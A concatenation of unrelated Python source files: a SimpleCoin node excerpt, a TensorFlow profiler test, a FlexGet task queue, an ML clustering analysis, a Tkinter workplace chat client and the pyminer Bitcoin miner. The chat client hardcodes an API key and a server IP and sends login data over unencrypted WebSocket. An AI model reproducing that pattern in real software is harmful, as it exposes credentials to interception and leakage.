print("AMOUNT: {0}\n".format(new_txion['amount']))
# Then we let the client know it worked out
return "Transaction submission successful\n"
else:
return "Transaction submission failed. Wrong signature\n"
# Send pending transactions to the mining process
elif request.method == 'GET' and request.args.get("update") == MINER_ADDRESS:
pending = json.dumps(NODE_PENDING_TRANSACTIONS, sort_keys=True)
# Empty transaction list
NODE_PENDING_TRANSACTIONS[:] = []
return pending
def validate_signature(public_key, signature, message):
"""Verifies if the signature is correct. This is used to prove
it's you (and not someone else) trying to do a transaction with your
address. Called when a user tries to submit a new transaction.
"""
public_key = (base64.b64decode(public_key)).hex()
signature = base64.b64decode(signature)
vk = ecdsa.VerifyingKey.from_string(bytes.fromhex(public_key), curve=ecdsa.SECP256k1)
# Try changing into an if/else statement as except is too broad.
try:
return vk.verify(signature, message.encode())
except:
return False
def welcome_msg():
print(""" =========================================\n
SIMPLE COIN v1.0.0 - BLOCKCHAIN SYSTEM\n
=========================================\n\n
You can find more help at: https://github.com/cosme12/SimpleCoin\n
Make sure you are using the latest version or you may end in
a parallel chain.\n\n\n""")
if __name__ == '__main__':
if MINER_ADDRESS == "":
print('You need to configure your miner_config.py file with your wallet address. You can generate a wallet address using the wallet.py file.')
else:
welcome_msg()
# Start mining
a, b = Pipe()
p1 = Process(target=mine, args=(a, BLOCKCHAIN, NODE_PENDING_TRANSACTIONS))
p1.start()
# Start server to receive transactions
p2 = Process(target=node.run(), args=b)
p2.start()
|
profiler_api_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf 2.x profiler."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import os
import threading
import portpicker
from tensorflow.python.distribute import collective_all_reduce_strategy as collective_strategy
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.eager import context
from tensorflow.python.framework import test_util
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.profiler import profiler_client
from tensorflow.python.profiler import profiler_v2 as profiler
from tensorflow.python.profiler.integration_test import mnist_testing_utils
def _model_setup():
"""Set up a MNIST Keras model for testing purposes.
Builds a MNIST Keras model and returns model information.
Returns:
A tuple of (batch_size, steps, train_dataset, mode)
"""
context.set_log_device_placement(True)
batch_size = 64
steps = 2
with collective_strategy.CollectiveAllReduceStrategy().scope():
# TODO(b/142509827): In rare cases this errors out at C++ level with the
# "Connect failed" error message.
train_ds, _ = mnist_testing_utils.mnist_synthetic_dataset(batch_size, steps)
model = mnist_testing_utils.get_mnist_model((28, 28, 1))
return batch_size, steps, train_ds, model
def _make_temp_log_dir(test_obj):
return test_obj.get_temp_dir()
class ProfilerApiTest(test_util.TensorFlowTestCase):
def _check_tools_pb_exist(self, logdir):
expected_files = [
'overview_page.pb',
'input_pipeline.pb',
'tensorflow_stats.pb',
'kernel_stats.pb',
]
for file in expected_files:
path = os.path.join(logdir, 'plugins', 'profile', '*', '*{}'.format(file))
self.assertEqual(1, len(glob.glob(path)),
'Expected one path match: ' + path)
def _check_xspace_pb_exist(self, logdir):
path = os.path.join(logdir, 'plugins', 'profile', '*', '*.xplane.pb')
self.assertEqual(1, len(glob.glob(path)),
'Expected one path match: ' + path)
def test_single_worker_no_profiling(self):
"""Test single worker without profiling."""
_, steps, train_ds, model = _model_setup()
model.fit(x=train_ds, epochs=2, steps_per_epoch=steps)
def test_single_worker_sampling_mode(self):
"""Test single worker sampling mode."""
def on_worker(port):
logging.info('worker starting server on {}'.format(port))
profiler.start_server(port)
_, steps, train_ds, model = _model_setup()
model.fit(x=train_ds, epochs=2, steps_per_epoch=steps)
def on_profile(port, logdir):
# Request for 30 milliseconds of profile.
duration_ms = 30
options = profiler.ProfilerOptions(
host_tracer_level=2,
python_tracer_level=0,
device_tracer_level=1,
)
profiler_client.trace('localhost:{}'.format(port), logdir, duration_ms,
'', 100, options)
logdir = self.get_temp_dir()
port = portpicker.pick_unused_port()
thread_profiler = threading.Thread(target=on_profile, args=(port, logdir))
thread_worker = threading.Thread(target=on_worker, args=(port,))
thread_worker.start()
thread_profiler.start()
thread_profiler.join()
thread_worker.join(120)
self._check_xspace_pb_exist(logdir)
def test_single_worker_programmatic_mode(self):
"""Test single worker programmatic mode."""
logdir = self.get_temp_dir()
options = profiler.ProfilerOptions(
host_tracer_level=2,
python_tracer_level=0,
device_tracer_level=1,
)
profiler.start(logdir, options)
_, steps, train_ds, model = _model_setup()
model.fit(x=train_ds, epochs=2, steps_per_epoch=steps)
profiler.stop()
self._check_xspace_pb_exist(logdir)
self._check_tools_pb_exist(logdir)
if __name__ == '__main__':
multi_process_runner.test_main()
|
task_queue.py
|
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
import logging
import queue
import sys
import threading
import time
from sqlalchemy.exc import ProgrammingError, OperationalError
from flexget.task import TaskAbort
log = logging.getLogger('task_queue')
class TaskQueue(object):
"""
Task processing thread.
Only executes one task at a time, if more are requested they are queued up and run in turn.
"""
def __init__(self):
self.run_queue = queue.PriorityQueue()
self._shutdown_now = False
self._shutdown_when_finished = False
self.current_task = None
# We don't override `threading.Thread` because debugging this seems unsafe with pydevd.
# Overriding __len__(self) seems to cause a debugger deadlock.
self._thread = threading.Thread(target=self.run, name='task_queue')
self._thread.daemon = True
def start(self):
self._thread.start()
def run(self):
while not self._shutdown_now:
# Grab the first job from the run queue and do it
try:
self.current_task = self.run_queue.get(timeout=0.5)
except queue.Empty:
if self._shutdown_when_finished:
self._shutdown_now = True
continue
try:
self.current_task.execute()
except TaskAbort as e:
log.debug('task %s aborted: %r' % (self.current_task.name, e))
except (ProgrammingError, OperationalError):
log.critical('Database error while running a task. Attempting to recover.')
self.current_task.manager.crash_report()
except Exception:
log.critical('BUG: Unhandled exception during task queue run loop.')
self.current_task.manager.crash_report()
finally:
self.run_queue.task_done()
self.current_task = None
remaining_jobs = self.run_queue.qsize()
if remaining_jobs:
log.warning('task queue shut down with %s tasks remaining in the queue to run.' % remaining_jobs)
else:
log.debug('task queue shut down')
def is_alive(self):
return self._thread.is_alive()
def put(self, task):
"""Adds a task to be executed to the queue."""
self.run_queue.put(task)
def __len__(self):
return self.run_queue.qsize()
def shutdown(self, finish_queue=True):
"""
Request shutdown.
:param bool finish_queue: Should all tasks be finished before ending thread.
"""
log.debug('task queue shutdown requested')
if finish_queue:
self._shutdown_when_finished = True
if self.run_queue.qsize():
log.verbose('There are %s tasks to execute. Shutdown will commence when they have completed.' %
self.run_queue.qsize())
else:
self._shutdown_now = True
def wait(self):
"""
Waits for the thread to exit.
Allows abortion of task queue with ctrl-c
"""
if sys.version_info >= (3, 4):
# Due to python bug, Thread.is_alive doesn't seem to work properly under our conditions on python 3.4+
# http://bugs.python.org/issue26793
# TODO: Is it important to have the clean abortion? Do we need to find a better way?
self._thread.join()
return
try:
while self._thread.is_alive():
time.sleep(0.5)
except KeyboardInterrupt:
log.error('Got ctrl-c, shutting down after running task (if any) completes')
self.shutdown(finish_queue=False)
# We still wait to finish cleanly, pressing ctrl-c again will abort
while self._thread.is_alive():
time.sleep(0.5)
|
bc-analysis.py
|
# source: https://github.com/joshuamorton/Machine-Learning/blob/master/P3/analysis.py
# source: https://github.com/iRapha/CS4641/blob/master/P3/analysis.py
import argparse
# import multiprocessing as mp
from pprint import pprint
from StringIO import StringIO
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans as KM
from sklearn.decomposition import FastICA as ICA
from sklearn.decomposition.pca import PCA as PCA
from sklearn.feature_selection import SelectKBest as best
from sklearn.feature_selection import chi2
from sklearn.mixture import GMM as EM
from sklearn.random_projection import GaussianRandomProjection as RandomProjection
from sknn.mlp import Classifier, Layer
import data_util as util
def plot(axes, values, x_label, y_label, title, name):
print "plot" + title + name
plt.clf()
plt.plot(*values)
plt.axis(axes)
plt.title(title)
plt.ylabel(y_label)
plt.xlabel(x_label)
plt.savefig("plots/bc/"+name+".png", dpi=500)
# plt.show()
plt.clf()
def pca(tx, ty, rx, ry):
print "pca"
compressor = PCA(n_components = tx[1].size/2)
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add="wPCAtr")
km(newtx, ty, newrx, ry, add="wPCAtr")
nn(newtx, ty, newrx, ry, add="wPCAtr")
print "pca done"
def ica(tx, ty, rx, ry):
print "ica"
compressor = ICA(whiten=True) # for some people, whiten needs to be off
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add="wICAtr")
km(newtx, ty, newrx, ry, add="wICAtr")
nn(newtx, ty, newrx, ry, add="wICAtr")
print "ica done"
def randproj(tx, ty, rx, ry):
print "randproj"
compressor = RandomProjection(tx[1].size)
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
# compressor = RandomProjection(tx[1].size)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add="wRPtr")
km(newtx, ty, newrx, ry, add="wRPtr")
nn(newtx, ty, newrx, ry, add="wRPtr")
print "randproj done"
def kbest(tx, ty, rx, ry):
print "kbest"
for i in range(7):
k = i + 1
add = "wKBtr" + str(k)
compressor = best(chi2, k=k)
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add=add)
km(newtx, ty, newrx, ry, add=add)
nn(newtx, ty, newrx, ry, add=add)
print "kbest done"
def em(tx, ty, rx, ry, add="", times=10):
print "em" + add
errs = []
# this is what we will compare to
checker = EM(n_components=2)
checker.fit(ry)
truth = checker.predict(ry)
# so we do this a bunch of times
for i in range(2,times):
clusters = {x:[] for x in range(i)}
# create a clusterer
clf = EM(n_components=i)
clf.fit(tx) #fit it to our data
test = clf.predict(tx)
result = clf.predict(rx) # and test it on the testing set
# here we make the arguably awful assumption that for a given cluster,
# all values in tha cluster "should" in a perfect world, belong in one
# class or the other, meaning that say, cluster "3" should really be
# all 0s in our truth, or all 1s there
#
# So clusters is a dict of lists, where each list contains all items
# in a single cluster
for index, val in enumerate(result):
clusters[val].append(index)
# then we take each cluster, find the sum of that clusters counterparts
# in our "truth" and round that to find out if that cluster should be
# a 1 or a 0
mapper = {x: round(sum(truth[v] for v in clusters[x])/float(len(clusters[x]))) if clusters[x] else 0 for x in range(i)}
# the processed list holds the results of this, so if cluster 3 was
# found to be of value 1,
# for each value in clusters[3], processed[value] == 1 would hold
processed = [mapper[val] for val in result]
errs.append(sum((processed-truth)**2) / float(len(ry)))
plot([0, times, min(errs)-.1, max(errs)+.1],[range(2, times), errs, "ro"], "Number of Clusters", "Error Rate", "Expectation Maximization Error", "EM"+add)
# dank magic, wrap an array cuz reasons
td = np.reshape(test, (test.size, 1))
rd = np.reshape(result, (result.size, 1))
newtx = np.append(tx, td, 1)
newrx = np.append(rx, rd, 1)
nn(newtx, ty, newrx, ry, add="onEM"+add)
print "em done" + add
def km(tx, ty, rx, ry, add="", times=10):
print "km"
#this does the exact same thing as the above
clusters = [8, 11] # eight for num speakers, eleven for num vowels
for num_c in clusters:
add += "nc" + str(num_c)
errs = []
checker = KM(n_clusters=num_c)
checker.fit(ry)
truth = checker.predict(ry)
# so we do this a bunch of times
for i in range(2,times):
clusters = {x:[] for x in range(i)}
clf = KM(n_clusters=i)
clf.fit(tx) #fit it to our data
test = clf.predict(tx)
result = clf.predict(rx) # and test it on the testing set
for index, val in enumerate(result):
clusters[val].append(index)
mapper = {x: round(sum(truth[v] for v in clusters[x])/float(len(clusters[x]))) if clusters[x] else 0 for x in range(i)}
processed = [mapper[val] for val in result]
errs.append(sum((processed-truth)**2) / float(len(ry)))
plot([0, times, min(errs)-.1, max(errs)+.1],[range(2, times), errs, "ro"], "Number of Clusters", "Error Rate", "KMeans clustering error", "KM"+add)
td = np.reshape(test, (test.size, 1))
rd = np.reshape(result, (result.size, 1))
newtx = np.append(tx, td, 1)
newrx = np.append(rx, rd, 1)
nn(newtx, ty, newrx, ry, add="onKM"+add)
print "km done" + add
def nn(tx, ty, rx, ry, add="", iterations=4001):
"""
trains and plots a neural network on the data we have
"""
print "nn" + add
resultst = []
resultsr = []
iter_arr = np.arange(iterations, step=500)
iter_arr[0] = 1
# queue = mp.Queue()
# processes = []
# processes = [mp.Process(target=_nn, args=[tx, ty, rx, ry, i_num]) for i_num in iter_arr]
# for p in processes:
# p.start()
# for p in processes:
# p.join()
# results = []
# for _ in processes:
# results.append(queue.get());
# for result in sorted(results, key=lambda x: x[0]):
# print result
# i_num, train_score, test_score = result
# resultst.append(train_score)
# resultsr.append(test_score)
for i_num in iter_arr:
result = _nn(tx, ty, rx, ry, i_num)
print result
resultst.append(1. - result[1])
resultsr.append(1. - result[2])
plot([0, iterations, 0, 1], (iter_arr, resultst, "ro", iter_arr, resultsr, "bo"), "Network Epoch", "Percent Error", "Neural Network Error", "NN"+add)
print "nn done" + add
def _nn(tx, ty, rx, ry, n_iter):
print "_nn"
nn = Classifier(
layers=[
Layer("Sigmoid", units=100),
Layer("Softmax")],
n_iter=n_iter)
nn.fit(tx, ty)
resultst = nn.score(tx, ty)
resultsr = nn.score(rx, ry)
print "_nn done"
return n_iter, resultst, resultsr
if __name__=="__main__":
train_x, train_y, test_x, test_y = util.load_breast_cancer()
kbest(train_x, train_y, test_x, test_y)
em(train_x, train_y, test_x, test_y)
km(train_x, train_y, test_x, test_y)
randproj(train_x, train_y, test_x, test_y)
pca(train_x, train_y, test_x, test_y)
ica(train_x, train_y, test_x, test_y)
nn(train_x, train_y, test_x, test_y)
|
__init__.py
|
#!/usr/bin/python3
import os
import sys
import json
import websocket
import time
import datetime
from tkinter import *
from PIL import ImageTk, Image
from threading import Thread
from textwrap3 import wrap
from ..database.datalocal import *
from ..database.database import *
class ChatSocket_C:
def __init__(self, master, id_from, id_to):
self.employee_id_from = id_from
self.employee_id_to = id_to
self.master = master
self.API_KEY = "hfjkasdhfkjashdfaçsljf"
self.ws = websocket.WebSocketApp("ws://34.95.239.34:5000/", on_open=self.ws_open, on_message=self.ws_message)
self.receive_thread = Thread(target=self.ws_thread)
self.receive_thread.setDaemon(True)
self.receive_thread.start()
time.sleep(5)
self.msg_json = json.dumps(({"type": "init", "message": {"employee_id_from": self.employee_id_from, "employee_id_to" : self.employee_id_to}}))
self.ws.send(self.msg_json)
def ws_thread(self):
self.ws.run_forever()
def ws_open(self):
msg_json = json.dumps({"type": "login", "auth": {"employee_id_from": self.employee_id_from, "params": self.API_KEY}})
print(msg_json)
self.ws.send(msg_json)
def ws_send(self, message):
self.ws_open()
msg_json = json.dumps(({"type": "message", "message": {"employee_id_from": self.employee_id_from, "employee_id_to" : self.employee_id_to, "type" : "C", "description": message}}))
print(msg_json)
self.ws.send(msg_json)
def ws_message(self, message):
msg_json = json.loads(message)
print(msg_json)
self.master.receive(msg_json["message"]["is_send_from"], msg_json["message"]["description"], msg_json["message"]["start_date"])
def ws_init(self):
msg_json = json.dumps(({"type": "init", "message": {"employee_id_from": self.employee_id_from, "employee_id_to" : self.employee_id_to}}))
print(msg_json)
self.ws.send(msg_json)
class ScrollFrame(Frame):
def __init__(self, parent):
super().__init__(parent)
self.canvas = Canvas(self, borderwidth=0, background="#ffffff", width=695, height=380)
self.viewPort = Frame(self.canvas, width=695, height=380,background="#ffffff")
self.vsb = Scrollbar(self, orient="vertical", width=16, command=self.canvas.yview)
self.vsb.grid(row=0, column=1, sticky='ns')
self.canvas.configure(yscrollcommand=self.vsb.set)
self.vsb.pack(side="right", fill="y")
self.canvas.pack(side="left", fill="both", expand=True)
self.canvas_window = self.canvas.create_window((4,4), window=self.viewPort, anchor="nw", tags="self.viewPort")
self.viewPort.bind("<Configure>", self.onFrameConfigure)
self.canvas.bind("<Configure>", self.onCanvasConfigure)
self.onFrameConfigure(None)
def onFrameConfigure(self, event):
self.canvas.configure(yscrollcommand=self.vsb.set, scrollregion=self.canvas.bbox('all'))
def onCanvasConfigure(self, event):
canvas_width = event.width
self.canvas.itemconfig(self.canvas_window, width = canvas_width)
class ChatFrame:
def send(self, event=None):
msg = self.entry_field.get("1.0", END)
if(msg != ""):
self.ws_send(msg)
self.entry_field.delete(1.0, END)
def receive(self, isfrom, message, date):
hour = datetime.datetime.strptime(date, '%Y-%m-%d %H:%M:%S.%f')
message = message
novaMensagem = ""
for txtLine in wrap(message, 80):
novaMensagem += txtLine+"\n"
novaMensagem += "\n"+hour.strftime("%H:%M - %d/%m/%Y")
if isfrom == 1:
self.msg_list_escreve = Label(self.primeiroContainer2.viewPort, text=novaMensagem, width=80, bg="gray96", anchor='ne', justify='right', font=self.fontPadrao).pack(padx=0, pady=3)
else:
self.msg_list_escreve = Label(self.primeiroContainer2.viewPort, text=novaMensagem, width=80, bg="gray91", anchor='nw', justify='left', font=self.fontPadrao).pack(padx=0, pady=3)
self.primeiroContainer2.canvas.yview_moveto(3)
self.primeiroContainer2.onFrameConfigure()
def rand_func(self, a, b):
self.webS = ChatSocket_C(self.master, self.InfoUser["employee"]["id"], b)
self.ws_send = self.webS.ws_send
self.send_button["state"] = "normal"
def __init__(self, master):
self.InfoUserDBLocal = DataLocal()
self.InfoUser = self.InfoUserDBLocal.dados()
self.DataBaseInfo = DataBase()
self.infoUserHierarchGroup = self.DataBaseInfo.init_workday_chat(self.InfoUser["employee"]["cpf"])
self.base_dir = "C:\\ConectaIT\\modules\\chat"
self.dir_path = "C:\\ConectaIT\\modules\\chat"
self.master = master
self.fontPadrao = ("Arial", 11)
self.fontMessage = ("Arial", 10)
self.Conteiner = Frame(self.master)
self.Conteiner["height"] = 480
self.Conteiner["width"] = 300
self.Conteiner["bg"] = "#FFFFFF"
self.Conteiner.pack(side=LEFT, anchor="nw")
self.Conteiner0 = Frame(self.master)
self.Conteiner0["height"] = 480
self.Conteiner0["width"] = 5
self.Conteiner0["bg"] = "#F2F2F2"
self.Conteiner0.pack(side=LEFT)
self.Conteiner1 = Frame(self.master)
self.Conteiner1["height"] = 480
self.Conteiner1["width"] = 695
self.Conteiner1["bg"] = "#FFFFFF"
self.Conteiner1.pack(side=LEFT)
self.tipodeChat = Frame(self.Conteiner1)
self.tipodeChat["width"] = 695
self.tipodeChat["height"] = 2
self.tipodeChat["bg"] = "snow"
self.tipodeChat.pack()
self.UsersON = Frame(self.Conteiner)
self.UsersON["pady"] = 0
self.UsersON["width"] = 300
self.UsersON["height"] = 20
self.UsersON["bg"] = "#FAFAFA"
self.UsersON.pack()
self.Ants = 0
self.ConteinerInfoBoxUserSelect = {}
self.UrlLinkImg = {}
self.ConteinerInfoBoxUserSelectImagem = {}
self.ConteinerInfoBoxUserSelect2 = {}
self.textConteinerUser = {}
#self.ConteinerUserTB = ScrollFrame2(self.Conteiner)
#self.ConteinerUserTB["pady"] = 0
#self.ConteinerUserTB["bg"] = "#FAFAFA"
#self.ConteinerUserTB.pack()
for jso in self.infoUserHierarchGroup["hierarch_group"]:
self.ConteinerInfoBoxUserSelect[self.Ants] = Canvas(self.Conteiner, width=300, height=50, borderwidth=0, bg="#FFFFFF")
self.ConteinerInfoBoxUserSelect[self.Ants].bind("<Button-1>", lambda event, a=jso["name"], b=jso["id"]: self.rand_func(a, b))
self.ConteinerInfoBoxUserSelect[self.Ants].bind("<Key>", lambda event, a=jso["name"], b=jso["id"]: self.rand_func(a, b))
self.ConteinerInfoBoxUserSelect[self.Ants].pack()
self.UrlLinkImg[self.Ants] = ImageTk.PhotoImage(Image.open(self.dir_path + "\\..\\logs\\img\\"+self.InfoUserDBLocal.imagem_user_download_outros(jso["imagem"]["file_path"], jso["imagem"]["file_name"])).resize((40, 40), Image.ANTIALIAS), master=self.master)
self.ConteinerInfoBoxUserSelectImagem[self.Ants] = self.ConteinerInfoBoxUserSelect[self.Ants].create_image(27, 27, image=self.UrlLinkImg[self.Ants])
for txtLine in wrap(jso["name"], 20):
self.textConteinerUser[self.Ants] = txtLine
break
self.ConteinerInfoBoxUserSelect[self.Ants].create_text(70, 12, font=("Arial", 11), anchor="nw", text=self.textConteinerUser[self.Ants])
self.Ants = self.Ants + 1
self.chatLabel = Label(self.tipodeChat, text="Mensagens: " , bg="gray90", width=695,
height=2, anchor="nw", font=self.fontPadrao).pack()
self.primeiroContainer2 = ScrollFrame(self.Conteiner1)
self.primeiroContainer2["pady"] = 0
self.primeiroContainer2["width"] = 695
self.primeiroContainer2["height"] = 400
self.primeiroContainer2["bg"] = "snow"
self.primeiroContainer2.pack()
self.containerEscrever = Frame(self.Conteiner1)
self.containerEscrever["pady"] = 0
self.containerEscrever["width"] = 695
self.containerEscrever["height"] = 30
self.containerEscrever.pack()
self.entry_field = Text(self.containerEscrever, font=('Arial', 12), width=70, height=8)
self.entry_field.pack(side=LEFT, fill=Y)
self.icone_send = ImageTk.PhotoImage(Image.open(self.dir_path + "\\..\\..\\modules\\chat\\Send.png").resize((40, 40), Image.ANTIALIAS), master=master)
self.send_button = Button(self.containerEscrever, text="Enviar", command=self.send)
self.send_button['image'] = self.icone_send
self.send_button["width"] = 60
self.send_button["height"] = 60
self.send_button["bg"] = "#FFFFFF"
self.send_button["borderwidth"] = 0
self.send_button["state"] = "disabled"
self.send_button.pack(side=RIGHT, fill=BOTH)
class TkInit_chat:
def __init__(self, id_from, id_to):
self.chat = Tk()
self.chat.title("Conecta - Chat")
self.chat["borderwidth"] = 0
self.chat["bg"] = "white"
self.w = 1000
self.h = 480
self.ws = self.chat.winfo_screenwidth()
self.hs = self.chat.winfo_screenheight()
self.x = (self.ws/2) - (self.w/2)
self.y = (self.hs/2) - (self.h/2)
self.chat.geometry('%dx%d+%d+%d' % (self.w, self.h, self.x, self.y))
self.chat.iconbitmap('media/img/icone.ico')
self.chat.resizable(0, 0)
self.chat.wm_attributes("-topmost", True)
self.inf = ChatFrame(self.chat)
self.chat.mainloop()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 2501
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
OSC3.py
|
#!/usr/bin/python
"""
This module contains an OpenSoundControl implementation (in Pure Python), based
(somewhat) on the good old 'SimpleOSC' implementation by Daniel Holth & Clinton
McChesney.
This implementation is intended to still be 'simple' to the user, but much more
complete (with OSCServer & OSCClient classes) and much more powerful (the
OSCMultiClient supports subscriptions & message-filtering, OSCMessage &
OSCBundle are now proper container-types)
===============================================================================
OpenSoundControl
===============================================================================
OpenSoundControl is a network-protocol for sending (small) packets of addressed
data over network sockets. This OSC-implementation supports the classical
UDP/IP protocol for sending and receiving packets but provides as well support
for TCP/IP streaming, whereas the message size is prepended as int32 (big
endian) before each message/packet.
OSC-packets come in two kinds:
- OSC-messages consist of an 'address'-string (not to be confused with a
(host:port) network-address!), followed by a string of 'typetags'
associated with the message's arguments (ie. 'payload'), and finally the
arguments themselves, encoded in an OSC-specific way. The OSCMessage class
makes it easy to create & manipulate OSC-messages of this kind in a
'pythonesque' way (that is, OSCMessage-objects behave a lot like lists)
- OSC-bundles are a special type of OSC-message containing only
OSC-messages as 'payload'. Recursively. (meaning; an OSC-bundle could
contain other OSC-bundles, containing OSC-bundles etc.)
OSC-bundles start with the special keyword '#bundle' and do not have an
OSC-address (but the OSC-messages a bundle contains will have OSC-addresses!).
Also, an OSC-bundle can have a timetag, essentially telling the receiving
server to 'hold' the bundle until the specified time. The OSCBundle class
allows easy cration & manipulation of OSC-bundles.
For further information see also http://opensoundcontrol.org/spec-1_0
-------------------------------------------------------------------------------
To send OSC-messages, you need an OSCClient, and to receive OSC-messages you
need an OSCServer.
The OSCClient uses an 'AF_INET / SOCK_DGRAM' type socket (see the 'socket'
module) to send binary representations of OSC-messages to a remote host:port
address.
The OSCServer listens on an 'AF_INET / SOCK_DGRAM' type socket bound to a local
port, and handles incoming requests. Either one-after-the-other (OSCServer) or
in a multi-threaded / multi-process fashion (ThreadingOSCServer/
